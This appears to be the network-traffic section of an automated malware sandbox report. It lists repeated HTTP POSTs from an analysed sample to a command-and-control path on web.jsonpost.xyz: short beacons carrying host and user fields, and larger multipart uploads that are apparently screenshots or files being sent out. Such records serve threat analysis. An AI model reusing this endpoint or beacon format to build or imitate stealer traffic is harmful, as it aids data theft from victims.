              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----b9b9ff44e8c4fb7bf9d9e9a94afafff0Host: web.jsonpost.xyzContent-Length: 99446Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----2da2ec123a554cc4f0e9e4f45f265c8cHost: web.jsonpost.xyzContent-Length: 102787Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----75fc820eeb92975bff3e841961ce7c5bHost: web.jsonpost.xyzContent-Length: 98287Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----0c493e27f64201eb17b9a0de8f16fea0Host: web.jsonpost.xyzContent-Length: 98257Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----88c41d18d04efae2b058311875d35af8Host: web.jsonpost.xyzContent-Length: 99423Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7Host: web.jsonpost.xyzContent-Length: 98005Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: web.jsonpost.xyzContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /sj2vMs/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7Host: web.jsonpost.xyzContent-Length: 98018Cache-Control: no-cache
